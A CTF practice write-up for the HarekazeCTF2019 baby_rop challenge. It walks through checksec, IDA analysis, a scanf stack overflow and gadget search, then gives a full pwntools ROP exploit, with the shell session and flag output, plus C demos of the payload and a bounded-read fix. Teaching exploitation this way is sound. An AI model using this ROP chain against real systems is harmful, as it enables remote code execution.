[pwn practice notes] 02. [HarekazeCTF2019]baby_rop 1
Challenge: [HarekazeCTF2019]baby_rop 1
First, check the binary:
C:\Users\A\Downloads>checksec babyrop
[*] 'C:\\Users\\A\\Downloads\\babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
What each line means:
- 64-bit, little-endian
- Partial RELRO: the binary still uses lazy binding, so the GOT (.got.plt) remains writable
- No stack canary, so overwriting the saved rbp and return address goes unnoticed
- NX enabled: the stack is not executable, so shellcode on the stack is out
- No PIE: the image is loaded at the fixed base 0x400000, so PLT entries, gadgets and .data addresses can be used as-is
- Not stripped: the symbol table is retained, so function names show up in IDA
No canary, fixed addresses and a non-executable stack point to a plain stack overflow turned into ROP.
Open the file in IDA and look at main:
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4[16]; // [rsp+0h] [rbp-10h] BYREF
system("echo -n \"What's your name? \"");
__isoc99_scanf("%s", v4);
printf("Welcome to the Pwn World, %s!\n", v4);
return 0;
}
The overflow is obvious: __isoc99_scanf("%s", v4) reads an unbounded string into a 16-byte buffer. Double-click v4 to see the stack frame:
-0000000000000010 var_10 db ?
-000000000000000F db ? ; undefined
-000000000000000E db ? ; undefined
-000000000000000D db ? ; undefined
-000000000000000C db ? ; undefined
-000000000000000B db ? ; undefined
-000000000000000A db ? ; undefined
-0000000000000009 db ? ; undefined
-0000000000000008 db ? ; undefined
-0000000000000007 db ? ; undefined
-0000000000000006 db ? ; undefined
-0000000000000005 db ? ; undefined
-0000000000000004 db ? ; undefined
-0000000000000003 db ? ; undefined
-0000000000000002 db ? ; undefined
-0000000000000001 db ? ; undefined
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
v4 sits at rbp-0x10, so 0x10 bytes fill the buffer, the next 8 bytes overwrite the saved rbp, and everything from byte 0x18 onward lands on the return address. The payload therefore needs 0x10 + 8 bytes of junk before the ROP chain.
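To make the offset concrete, here is an added example (not code from the writeup) that reproduces main's frame as IDA lays it out, builds the same bytes the exploit sends, and feeds them through the binary's scanf("%s") read beside a width-limited read. The pop rdi; ret gadget 0x400683 and the /bin/sh address 0x601048 are the ones this writeup finds; SYSTEM_PLT is a placeholder, not taken from the binary, and the chain[] tail is only there so the demo's writes stay inside the struct.

```c
#define _POSIX_C_SOURCE 200809L   /* fmemopen */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* main's frame as IDA shows it: name[16] at rbp-0x10, then the saved rbp,
 * then the return address.  chain[] stands for the qwords above the return
 * address, where a ROP chain's arguments and next targets go; it also keeps
 * the NUL that scanf appends inside the struct, so nothing else is touched. */
struct frame {
    char     name[16];
    uint64_t saved_rbp;
    uint64_t ret_addr;
    uint64_t chain[3];
};

#define PADDING (0x10 + 8)              /* junk bytes before the return address */

#define POP_RDI_RET 0x400483ULL + 0x200 /* 0x400683: pop rdi; ret (ROPgadget, writeup) */
#define BIN_SH      0x601048ULL         /* "/bin/sh" in .data (IDA, writeup) */
#define SYSTEM_PLT  0x400490ULL         /* placeholder: assumed, not from the writeup */

static void put64le(uint8_t *p, uint64_t v)   /* same bytes as pwntools p64() */
{
    for (int i = 0; i < 8; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

/* padding + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_plt); returns the length. */
size_t build_payload(uint8_t *out, size_t cap)
{
    const uint64_t words[3] = { POP_RDI_RET, BIN_SH, SYSTEM_PLT };
    size_t len = PADDING + sizeof words;
    if (cap < len)
        return 0;
    memset(out, 'a', PADDING);
    for (int i = 0; i < 3; i++)
        put64le(out + PADDING + 8 * i, words[i]);
    return len;
}

/* The vulnerable read.  "%s" stops only at whitespace or end of input, so it
 * copies NUL bytes and keeps writing for as long as the input lasts. */
int vulnerable_read(struct frame *f, const uint8_t *input, size_t len)
{
    FILE *in = fmemopen((void *)input, len, "r");
    if (!in)
        return -1;
    int matched = fscanf(in, "%s", f->name);
    fclose(in);
    return matched;
}

/* Hardened read: a field width of sizeof(name) - 1 leaves room for the NUL
 * and can never reach saved_rbp or ret_addr. */
int safe_read(struct frame *f, const uint8_t *input, size_t len)
{
    FILE *in = fmemopen((void *)input, len, "r");
    if (!in)
        return -1;
    int matched = fscanf(in, "%15s", f->name);
    fclose(in);
    return matched;
}

/* Arbitrary "before" values so an overwrite is visible. */
void init_frame(struct frame *f)
{
    memset(f, 0, sizeof *f);
    f->saved_rbp = 0x7ffc1234dead0000ULL;
    f->ret_addr  = 0x400600ULL;
}

/* Build the payload, push it through one reader, return the resulting frame. */
struct frame run_read(int (*reader)(struct frame *, const uint8_t *, size_t))
{
    uint8_t payload[64];
    size_t len = build_payload(payload, sizeof payload);
    struct frame f;
    init_frame(&f);
    reader(&f, payload, len);
    return f;
}

int main(void)
{
    struct frame v = run_read(vulnerable_read);
    struct frame s = run_read(safe_read);
    printf("%%s  : saved_rbp=%#llx ret_addr=%#llx rdi=%#llx next=%#llx\n",
           (unsigned long long)v.saved_rbp, (unsigned long long)v.ret_addr,
           (unsigned long long)v.chain[0], (unsigned long long)v.chain[1]);
    printf("%%15s: saved_rbp=%#llx ret_addr=%#llx name=\"%s\"\n",
           (unsigned long long)s.saved_rbp, (unsigned long long)s.ret_addr, s.name);
    return 0;
}
```

With "%s" the saved rbp becomes 0x6161616161616161 and the return address becomes the gadget, exactly the 0x10 + 8 layout above; with "%15s" the buffer holds 15 characters plus the NUL and the saved registers are untouched. fmemopen is used instead of stdin so the NUL bytes inside the addresses reach scanf the same way they do from a socket.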
main already calls system, so the binary has a PLT entry for it and system@plt can be called directly.
Press Shift+F12 in IDA to list the strings; /bin/sh is present in .data:
LOAD:0000000000400238 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:0000000000400349 0000000A C libc.so.6
LOAD:0000000000400353 0000000F C __isoc99_scanf
LOAD:0000000000400362 00000007 C printf
LOAD:0000000000400369 00000007 C system
LOAD:0000000000400370 00000012 C __libc_start_main
LOAD:0000000000400382 0000000F C __gmon_start__
LOAD:0000000000400391 0000000A C GLIBC_2.7
LOAD:000000000040039B 0000000C C GLIBC_2.2.5
.rodata:00000000004006A8 0000001D C echo -n \"What's your name? \"
.rodata:00000000004006C8 0000001F C Welcome to the Pwn World, %s!\n
.eh_frame:0000000000400787 00000006 C ;*3$\"
.data:0000000000601048 00000008 C /bin/sh
Because this is a 64-bit program, the first argument to system is passed in rdi rather than on the stack, so a pop rdi; ret gadget is needed. Find one with ROPgadget:
┌──(kali㉿kali)-[~/桌面/attack]
└─$ ROPgadget --binary "./babyrop" --only "pop|ret" | grep rdi
0x0000000000400683 : pop rdi ; ret
Summary:
The binary provides system@plt, a /bin/sh string and a pop rdi; ret gadget, so the stack overflow becomes a three-word ROP chain: pop rdi; ret, the address of /bin/sh, then system@plt. Two checks before sending it: scanf("%s") stops at whitespace (0x09-0x0d and 0x20), so no address in the chain may contain such a byte (0x400683 and 0x601048 are fine; check the PLT address the same way), and on newer glibc system() expects a 16-byte aligned stack at entry, so if it faults locally on a movaps, put an extra ret gadget (0x400684, the c3 byte of pop rdi; ret) in front of the chain.
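The alignment check above can be done on paper, but it is easy to get wrong, so here is an added example (not code from the writeup) that walks rsp through the chain the way the CPU would and pads the chain with a lone ret when system() would be entered misaligned. The gadget 0x400683 and the /bin/sh address 0x601048 come from this writeup; the ret at 0x400684 is the second byte of that gadget (5f c3); SYSTEM_PLT is an assumed placeholder.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define POP_RDI_RET 0x400683ULL   /* pop rdi; ret (ROPgadget, writeup) */
#define RET         0x400684ULL   /* the c3 byte of that gadget: a lone ret */
#define BIN_SH      0x601048ULL   /* "/bin/sh" in .data (writeup) */
#define SYSTEM_PLT  0x400490ULL   /* placeholder, not taken from the writeup */

/* Number of qwords a gadget pops before its ret; -1 for a call target. */
static int gadget_pops(uint64_t addr)
{
    if (addr == POP_RDI_RET) return 1;
    if (addr == RET)         return 0;
    return -1;                /* system@plt or any other function */
}

/* Walk the chain starting at main's return-address slot.  That slot sits at
 * rsp = 8 (mod 16): main is entered with rsp = 8 (mod 16), `push rbp` makes
 * rbp = 0 (mod 16), and the slot is rbp+8.  Each ret pops one qword, each
 * gadget additionally pops its arguments.  Returns rsp mod 16 at the moment
 * the first non-gadget target is entered, or -1 if the chain never calls one. */
int rsp_mod16_at_call(const uint64_t *chain, size_t n)
{
    unsigned rsp = 8;
    size_t i = 0;
    while (i < n) {
        uint64_t target = chain[i++];
        rsp = (rsp + 8) % 16;           /* the ret that popped `target` */
        int pops = gadget_pops(target);
        if (pops < 0)
            return (int)rsp;
        rsp = (rsp + 8 * (unsigned)pops) % 16;
        i += (size_t)pops;              /* the popped qwords are arguments, not targets */
    }
    return -1;
}

/* The SysV x86-64 ABI has rsp = 8 (mod 16) at function entry (16-aligned
 * before the call, minus the pushed return address).  Recent glibc system()
 * relies on that for a movaps to the stack; 0 here means a fault. */
int chain_is_aligned(const uint64_t *chain, size_t n)
{
    return rsp_mod16_at_call(chain, n) == 8;
}

/* Copy the chain into out, inserting one ret in front if it is misaligned.
 * Returns the new length, or 0 if out is too small. */
size_t align_chain(const uint64_t *chain, size_t n, uint64_t *out, size_t cap)
{
    size_t extra = chain_is_aligned(chain, n) ? 0 : 1;
    if (n + extra > cap)
        return 0;
    if (extra)
        out[0] = RET;                   /* a ret consumes 8 bytes and changes nothing else */
    memcpy(out + extra, chain, n * sizeof *chain);
    return n + extra;
}

int main(void)
{
    uint64_t chain[3] = { POP_RDI_RET, BIN_SH, SYSTEM_PLT };   /* the writeup's chain */
    uint64_t fixed[4];
    size_t m = align_chain(chain, 3, fixed, 4);

    printf("original chain: rsp mod 16 at system = %d (%s)\n",
           rsp_mod16_at_call(chain, 3), chain_is_aligned(chain, 3) ? "ok" : "misaligned");
    printf("padded chain (%zu words): rsp mod 16 at system = %d\n",
           m, rsp_mod16_at_call(fixed, m));
    return 0;
}
```

For the writeup's chain the simulation reports rsp = 0 (mod 16) when system is entered, which is why the same payload can segfault on a newer libc while it succeeded against this remote; prefixing one ret shifts it to 8 and the chain becomes ret, pop rdi; ret, /bin/sh, system@plt.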
Exploit script:
#!/usr/bin/env python3
from pwn import *

elf = ELF("./babyrop")
system_plt = elf.plt["system"]              # system@plt: the binary already imports system
bin_sh = next(elf.search(b"/bin/sh"))        # 0x601048 in .data
pop_rdi_ret = 0x400683                       # from ROPgadget

# 0x10 bytes fill v4, 8 more overwrite the saved rbp, then the chain starts
# at the return address: pop rdi; ret -> "/bin/sh" -> system@plt.
payload = b"a" * (0x10 + 8) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_plt)

io = remote("node5.buuoj.cn", 27498)
io.recvuntil(b"What's your name? ")
io.sendline(payload)                         # scanf("%s") stops at the trailing newline
io.interactive()
Once the shell comes back, ls shows no flag in the current directory, so locate it with find -name flag:
[+] Opening connection to node5.buuoj.cn on port 27498: Done
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ find -name flag
find: './root': Permission denied
./home/babyrop/flag
find: './proc/tty/driver': Permission denied
find: './proc/1/task/1/fd': Permission denied
find: './proc/1/task/1/fdinfo': Permission denied
find: './proc/1/task/1/ns': Permission denied
find: './proc/1/fd': Permission denied
find: './proc/1/map_files': Permission denied
find: './proc/1/fdinfo': Permission denied
find: './proc/1/ns': Permission denied
find: './proc/7/task/7/fd': Permission denied
find: './proc/7/task/7/fdinfo': Permission denied
find: './proc/7/task/7/ns': Permission denied
find: './proc/7/fd': Permission denied
find: './proc/7/map_files': Permission denied
find: './proc/7/fdinfo': Permission denied
find: './proc/7/ns': Permission denied
find: './var/cache/ldconfig': Permission denied
find: './var/cache/apt/archives/partial': Permission denied
find: './var/lib/apt/lists/partial': Permission denied
find: './var/spool/rsyslog': Permission denied
find: './var/spool/cron/crontabs': Permission denied
$ cat ./home/babyrop/flag
flag{d3ccdf65-5baf-4d71-b2ff-1ad65e5c8b71}
$
[*] Closed connection to node5.buuoj.cn port 27498